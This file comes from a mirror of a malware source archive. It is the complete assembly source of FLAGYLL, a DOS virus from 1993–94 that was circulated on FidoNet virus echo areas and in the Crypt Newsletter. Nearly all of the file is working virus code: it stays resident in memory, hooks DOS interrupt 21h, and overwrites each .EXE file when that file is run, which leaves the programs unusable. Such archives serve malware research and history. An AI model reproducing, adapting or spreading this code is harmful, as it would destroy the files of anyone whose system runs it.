mirror of
https://github.com/vxunderground/MalwareSourceCode
synced 2024-07-05 09:52:02 +00:00
269 lines
7.5 KiB
NASM
269 lines
7.5 KiB
NASM
|
;<3B> PVT.VIRII (2:465/65.4) <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> PVT.VIRII <20>
|
|||
|
|
; Msg : 36 of 54
|
|||
|
|
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
|
|||
|
|
; To : - *.* - Fri 11 Nov 94 08:10
|
|||
|
|
; Subj : FLAGYLL.ASM
|
|||
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
;.RealName: Max Ivanov
|
|||
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
;* Kicked-up by MeteO (2:5030/136)
|
|||
|
|
;* Area : VIRUS (Int: <20><><EFBFBD><EFBFBD>p<EFBFBD><70><EFBFBD><EFBFBD><EFBFBD> <20> <20><>p<EFBFBD><70><EFBFBD><EFBFBD>)
|
|||
|
|
;* From : Gilbert Holleman, 2:283/718 (06 Nov 94 17:38)
|
|||
|
|
;* To : Bill Dirks
|
|||
|
|
;* Subj : FLAGYLL.ASM
|
|||
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
;@RFC-Path:
|
|||
|
|
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
|
|||
|
|
;18.n283!not-for-mail
|
|||
|
|
;@RFC-Return-Receipt-To: Gilbert.Holleman@f718.n283.z2.fidonet.org
|
|||
|
|
;FLAGYLL virus - edited for Crypt Newsletter 13
|
|||
|
|
;FLAGYLL is a memory resident, overwriting virus which
|
|||
|
|
;infects and destroys .EXE files on load.
|
|||
|
|
;It updates the infected files time/date stamps to the time of
|
|||
|
|
;infection so it can easily be followed.
|
|||
|
|
;.EXE's infected by FLAGYLL are destroyed. DOS will either
|
|||
|
|
;refuse to load them or FLAGYLL will become resident
|
|||
|
|
;as they execute. These programs are ruined and can only
|
|||
|
|
;be deleted. Because it is so destructive to files, FLAGYLL cannnot
|
|||
|
|
;pose a threat in the wild, and in this respect, it is much
|
|||
|
|
;inferior to the SUSAN virus included in this issue.
|
|||
|
|
|
|||
|
|
.radix 16
|
|||
|
|
cseg segment
|
|||
|
|
model small
|
|||
|
|
assume cs:cseg, ds:cseg, es:cseg
|
|||
|
|
|
|||
|
|
org 100h
|
|||
|
|
|
|||
|
|
oi21 equ endflagyll
|
|||
|
|
filelength equ endflagyll - begin
|
|||
|
|
nameptr equ endflagyll+4
|
|||
|
|
DTA equ endflagyll+8
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
begin: jmp install_flagyll
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
; install
|
|||
|
|
install_flagyll:
|
|||
|
|
|
|||
|
|
mov ax,cs ; reduce memory size
|
|||
|
|
dec ax
|
|||
|
|
mov ds,ax
|
|||
|
|
cmp byte ptr ds:[0000],5a ; check if last memory
|
|||
|
|
jne cancel ; block
|
|||
|
|
mov ax,ds:[0003]
|
|||
|
|
sub ax,100 ; decrease memory
|
|||
|
|
mov ds:0003,ax
|
|||
|
|
|
|||
|
|
|
|||
|
|
copy_flagyll:
|
|||
|
|
mov bx,ax ; copy to claimed block
|
|||
|
|
mov ax,es ; PSP
|
|||
|
|
add ax,bx ; virus start in memory
|
|||
|
|
mov es,ax
|
|||
|
|
mov cx,offset endflagyll - begin ; cx = length of virus
|
|||
|
|
mov ax,ds ; restore ds
|
|||
|
|
inc ax
|
|||
|
|
mov ds,ax
|
|||
|
|
lea si,ds:[begin] ; point to start of virus
|
|||
|
|
lea di,es:0100 ; point to destination
|
|||
|
|
rep movsb ; copy virus in memory
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
hook_21:
|
|||
|
|
|
|||
|
|
mov ds,cx ; hook interrupt 21h
|
|||
|
|
mov si,0084h ;
|
|||
|
|
mov di,offset oi21
|
|||
|
|
mov dx,offset check_exec
|
|||
|
|
lodsw
|
|||
|
|
cmp ax,dx ;
|
|||
|
|
je cancel ; exit, if already installed
|
|||
|
|
stosw
|
|||
|
|
movsw
|
|||
|
|
|
|||
|
|
push es
|
|||
|
|
pop ds
|
|||
|
|
mov ax,2521h ; revector int 21h to virus
|
|||
|
|
int 21h
|
|||
|
|
|
|||
|
|
cancel: ret
|
|||
|
|
|
|||
|
|
check_exec: ; look over loaded files
|
|||
|
|
pushf ; for executables
|
|||
|
|
|
|||
|
|
push es ; push everything onto the
|
|||
|
|
push ds ; stack
|
|||
|
|
push ax
|
|||
|
|
push bx
|
|||
|
|
push dx
|
|||
|
|
|
|||
|
|
cmp ax,04B00h ; is a file being
|
|||
|
|
; executed ?
|
|||
|
|
|
|||
|
|
|
|||
|
|
jne abort ; no, exit
|
|||
|
|
|
|||
|
|
do_infect:
|
|||
|
|
call infect ; then try to infect
|
|||
|
|
|
|||
|
|
abort: ; restore everything
|
|||
|
|
pop dx
|
|||
|
|
pop bx
|
|||
|
|
pop ax
|
|||
|
|
pop ds
|
|||
|
|
pop es
|
|||
|
|
popf
|
|||
|
|
|
|||
|
|
exit:
|
|||
|
|
; exit
|
|||
|
|
jmp dword ptr cs:[oi21]
|
|||
|
|
|
|||
|
|
infect:
|
|||
|
|
jmp over_id ; it's a vanity thing
|
|||
|
|
|
|||
|
|
note: db '-=[Crypt Newsletter 13]=-'
|
|||
|
|
|
|||
|
|
|
|||
|
|
over_id:
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
mov cs:[name_seg],ds ; this routine
|
|||
|
|
mov cs:[name_off],dx ; essentially grabs
|
|||
|
|
; the name of the file
|
|||
|
|
cld ; clear direction flags
|
|||
|
|
mov word ptr cs:[nameptr],dx ; save pointer to the filename
|
|||
|
|
mov word ptr cs:[nameptr+2],ds
|
|||
|
|
|
|||
|
|
mov ah,2Fh ; get old DTA
|
|||
|
|
int 21h
|
|||
|
|
push es
|
|||
|
|
push bx
|
|||
|
|
|
|||
|
|
push cs ; set new DTA
|
|||
|
|
|
|||
|
|
pop ds
|
|||
|
|
mov dx,offset DTA
|
|||
|
|
mov ah,1Ah
|
|||
|
|
int 21h
|
|||
|
|
|
|||
|
|
call host_ident ; find filename for virus
|
|||
|
|
push di
|
|||
|
|
mov si,offset COM_txt ; is extension 'COM' ?
|
|||
|
|
|
|||
|
|
mov cx,3
|
|||
|
|
rep cmpsb
|
|||
|
|
pop di
|
|||
|
|
jz return ; if so, let it pass by
|
|||
|
|
mov si,offset EXE_txt ; is extension .EXE ?
|
|||
|
|
nop
|
|||
|
|
mov cl,3
|
|||
|
|
rep cmpsb
|
|||
|
|
jnz return
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
do_exe: ; infect host, destroying it
|
|||
|
|
|
|||
|
|
mov ax,4300h ; clear attributes
|
|||
|
|
mov ds,cs:[name_seg]
|
|||
|
|
mov dx,cs:[name_off]
|
|||
|
|
int 21h
|
|||
|
|
and cl,0FEh
|
|||
|
|
mov ax,4301h
|
|||
|
|
int 21h
|
|||
|
|
|
|||
|
|
mov ds,cs:[name_seg] ; open file read/write
|
|||
|
|
mov dx,cs:[name_off]
|
|||
|
|
mov ax,3D02h
|
|||
|
|
int 21h
|
|||
|
|
jc close_file
|
|||
|
|
push cs
|
|||
|
|
pop ds
|
|||
|
|
mov [handle],ax
|
|||
|
|
mov bx,ax
|
|||
|
|
|
|||
|
|
push cs
|
|||
|
|
pop ds
|
|||
|
|
mov ax,4200h ;set pointer to beginning of host
|
|||
|
|
|
|||
|
|
push cs
|
|||
|
|
pop ds
|
|||
|
|
mov bx,[handle] ;handle to BX
|
|||
|
|
xor cx,cx
|
|||
|
|
xor dx,dx
|
|||
|
|
int 21h
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
mov ah,40 ;write to file
|
|||
|
|
mov cx,filelength ;virus length in cx
|
|||
|
|
mov dx,100 ;start write at beginning of Flagyll
|
|||
|
|
int 21h ;do it
|
|||
|
|
|
|||
|
|
close_file: mov bx,[handle]
|
|||
|
|
mov ah,03Eh ;close file, name -->BX
|
|||
|
|
int 21h
|
|||
|
|
|
|||
|
|
mov ax,4C00h ;exit to DOS
|
|||
|
|
int 21h
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
return: mov ah,1Ah
|
|||
|
|
pop dx ; restore old DTA
|
|||
|
|
pop ds
|
|||
|
|
int 21H
|
|||
|
|
|
|||
|
|
ret ; let DOS regain control
|
|||
|
|
|
|||
|
|
|
|||
|
|
host_ident: les di,dword ptr cs:[nameptr] ; finds filename for
|
|||
|
|
mov ch,0FFh ; host selection
|
|||
|
|
mov al,0
|
|||
|
|
repnz scasb
|
|||
|
|
sub di,4
|
|||
|
|
ret
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
EXE_txt db 'EXE',0 ; extension masks
|
|||
|
|
COM_txt db 'COM',0 ; for host selection
|
|||
|
|
|
|||
|
|
name_seg dw ? ;data buffers for
|
|||
|
|
name_off dw ? ; viral use on the fly
|
|||
|
|
handle dw ?
|
|||
|
|
|
|||
|
|
note2: db 'Flagyll' ; virus name
|
|||
|
|
|
|||
|
|
endflagyll:
|
|||
|
|
|
|||
|
|
cseg ends
|
|||
|
|
end begin
|
|||
|
|
|
|||
|
|
;-+- GEcho 1.10+
|
|||
|
|
; + Origin: Poeldijk, The Netherlands, Europe, Earth (2:283/718)
|
|||
|
|
;=============================================================================
|
|||
|
|
;
|
|||
|
|
;Yoo-hooo-oo, -!
|
|||
|
|
;
|
|||
|
|
;
|
|||
|
|
; <20> The Me<4D>eO
|
|||
|
|
;
|
|||
|
|
;/3 Enable 32-bit processing
|
|||
|
|
;
|
|||
|
|
;--- Aidstest Null: /Kill
|
|||
|
|
; * Origin: <20>PVT.ViRII<49>main<69>board<72> / Virus Research labs. (2:5030/136)
|
|||
|
|
|